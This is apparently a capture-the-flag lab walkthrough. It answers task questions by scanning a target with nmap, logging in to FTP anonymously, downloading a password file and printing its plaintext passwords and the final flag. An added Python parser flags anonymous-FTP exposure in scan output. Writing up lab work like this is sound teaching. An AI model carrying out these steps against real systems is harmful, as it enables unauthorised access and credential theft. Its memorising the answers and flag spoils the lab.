# Task 1
Q:What nmap scanning switch employs the use of default scripts during a scan?
A: -sC
# Task 2
Q:What service version is found to be running on port 21?
```
┌──(root💀kali)-[~]
└─# nmap -sV -Pn -p21 10.129.1.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 15:47 CST
Nmap scan report for 10.129.1.15
Host is up (0.27s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.86 seconds
```
- `-sV`: version detection only
- `-Pn`: skip the ping scan
A: vsFTPd 3.0.3
# Task 3
Q:What FTP code is returned to us for the "Anonymous FTP login allowed" message?
```
┌──(root💀kali)-[~]
└─# nmap -sC -Pn -p21 10.129.1.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 15:50 CST
Nmap scan report for 10.129.1.15
Host is up (0.51s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist
|_-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.16.86
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Nmap done: 1 IP address (1 host up) scanned in 8.09 seconds
```
Line 9, the `ftp-anon` entry, shows that anonymous login is allowed; the response code is 230.
A:230
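
An added example, not part of the original write-up: a small Python parser that reads `nmap -sC` output like the scan above and reports each port where `ftp-anon` found an anonymous login, with the FTP code and the files it exposed. The sample text is constructed from the output above, and the sensitive-name pattern is an assumed heuristic.

```python
import re

# Constructed sample, abbreviated from the `nmap -sC` output shown above.
SAMPLE = """\
Nmap scan report for 10.129.1.15
PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
| ftp-syst:
|_End of status
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)")
ANON_RE = re.compile(r"^\|[ _]ftp-anon: Anonymous FTP login allowed \(FTP code (\d{3})\)")
# `ls -l` style entry inside script output: mode, links, owner, group, size, date, name.
FILE_RE = re.compile(
    r"^\|[ _]([-dl][rwxsStT-]{9})\s+\d+\s+\S+\s+\S+\s+(\d+)"
    r"\s+\w{3}\s+\d+\s+[\d:]+\s+(.+)$")
# Assumed heuristic: file names that suggest credentials or key material.
SENSITIVE_RE = re.compile(r"pass|cred|secret|shadow|userlist|\.key$|\.pem$", re.I)

def find_anonymous_ftp(nmap_text):
    """Return one finding per port where ftp-anon reported an anonymous login."""
    findings, host, port, current = [], None, None, None
    for line in nmap_text.splitlines():
        if m := HOST_RE.match(line):
            host, port, current = m.group(1), None, None
        elif m := PORT_RE.match(line):
            port, current = int(m.group(1)), None
        elif m := ANON_RE.match(line):
            current = {"host": host, "port": port, "code": int(m.group(1)), "files": []}
            findings.append(current)
        elif current is not None and (m := FILE_RE.match(line)):
            mode, size, name = m.groups()
            current["files"].append({
                "name": name, "size": int(size),
                "world_readable": mode[7] == "r",  # "other" read bit
                "sensitive_name": bool(SENSITIVE_RE.search(name)),
            })
        else:
            current = None  # any other line ends the ftp-anon listing
    return findings

if __name__ == "__main__":
    for finding in find_anonymous_ftp(SAMPLE):
        print(finding)
```
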
# Task 4
Q:What command can we use to download the files we find on the FTP server?
A:get
# Task 5
Q:What is one of the higher-privilege sounding usernames in the list we retrieved?
This requires logging in over FTP and using `get` to download the file, but going by the hint you can simply guess admin.
A:admin
# Task 6
Q:What version of Apache HTTP Server is running on the target host?
```
┌──(root💀kali)-[~]
└─# nmap -sV -Pn 10.129.1.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 15:55 CST
Nmap scan report for 10.129.1.15
Host is up (0.62s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.59 seconds
```
Line 9 makes it obvious. My scan listed every service version; to query only this port, add the parameter `-p80`.
A:2.4.41
# Task 7
Q:What is the name of a handy web site analysis plug-in we can install in our browser?
A:wappalyzer
# Task 8
Q:What switch can we use with gobuster to specify we are looking for specific filetypes?
A: -x
# Task 9
Q:What file have we found that can provide us a foothold on the target?
A:login.php
# Flag
Log in over FTP and download the password file.
```
┌──(root💀kali)-[~]
└─# ftp 10.129.1.15
Connected to 10.129.1.15.
220 (vsFTPd 3.0.3)
Name (10.129.1.15:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist
-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
226 Directory send OK.
ftp> get allowed.userlist.passwd
local: allowed.userlist.passwd remote: allowed.userlist.passwd
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes).
226 Transfer complete.
62 bytes received in 0.00 secs (197.2211 kB/s)
ftp> exit
221 Goodbye.
```
The fourth entry is admin's password.
```
┌──(root💀kali)-[~]
└─# cat allowed.userlist.passwd
root
Supersecretpassword1
@BaASD&9032123sADS
rKXM59ESxesUFHAd
```
Log in directly as admin to get the flag.
flag: c7110277ac44d78b6a9fff2232434d16